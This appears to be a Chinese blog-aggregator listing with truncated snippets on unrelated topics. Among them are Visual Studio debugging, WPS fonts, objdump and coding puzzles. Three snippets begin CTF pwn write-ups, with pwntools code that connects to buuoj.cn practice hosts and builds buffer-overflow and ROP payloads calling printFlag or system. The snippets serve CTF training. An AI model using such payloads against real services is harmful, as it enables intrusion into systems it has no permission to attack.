解决方法: 工程属性页 ->Debugging->Debugger Type, 设置为 'Managed Only' 环境: Visual Studio 2008 ...
分类:
其他好文 时间:
2020-03-03 10:41:47
阅读次数:
60
操作步骤 1、下载缺失字体 链接: https://pan.baidu.com/s/1ZUbtQ96b8RVbH0LrXb_GlQ 密码: nsr4 2、解压字体 unzip wps-font-symbols.zip 3、移动字体到文件夹 sudo cp -f wps-font-symbols /u ...
objdump objdump命令是用查看目标文件或者可执行的目标文件的构成的gcc工具。 ```shell $ objdump help 显示目标文件信息 a, archive headers Display archive header information 显示档案头 f, file hea ...
分类:
其他好文 时间:
2020-02-21 12:42:24
阅读次数:
51
Description Roman numerals are represented by seven different symbols: I, V, X, L, C, D and M. For example, two is written as II in Roman numeral, jus ...
分类:
其他好文 时间:
2020-02-20 09:28:12
阅读次数:
79
摘自https://www.jetbrains.com/help/pycharm/symbols.html ...
分类:
其他好文 时间:
2020-02-19 13:27:27
阅读次数:
73
找不到libc文件 用LibcSearcher模块 from pwn import * from LibcSearcher import * context.log_level='debug' r=remote('node3.buuoj.cn',28426) #r=process('./bjdctf ...
分类:
其他好文 时间:
2020-02-15 18:18:35
阅读次数:
185
Ayoub thinks that he is a very smart person, so he created a function f(s)f(s) , where ss is a binary string (a string which contains only symbols "0" ...
分类:
其他好文 时间:
2020-02-15 15:06:58
阅读次数:
55
一道水题 from pwn import * r=remote('node3.buuoj.cn',29769) elf=ELF('./bbys_tu_2016') payload='a'*24+p32(elf.symbols['printFlag']) r.sendline(payload) r.i ...
分类:
其他好文 时间:
2020-02-12 22:35:47
阅读次数:
189
程序已经给了system和binsh ,用寄存器传参就可以了 from pwn import * r=remote('node3.buuoj.cn',25737) elf=ELF('./babyrop') system_addr=elf.symbols['system'] binsh_addr=0x ...
分类:
其他好文 时间:
2020-02-10 11:31:05
阅读次数:
138
https://docs.google.com/spreadsheets/d/1FLFJLzg7WNP6JHODX5q8BDgptKafq_slHpnHVbJIteQ/edit#gid=0 ...
分类:
其他好文 时间:
2020-02-08 20:53:09
阅读次数:
96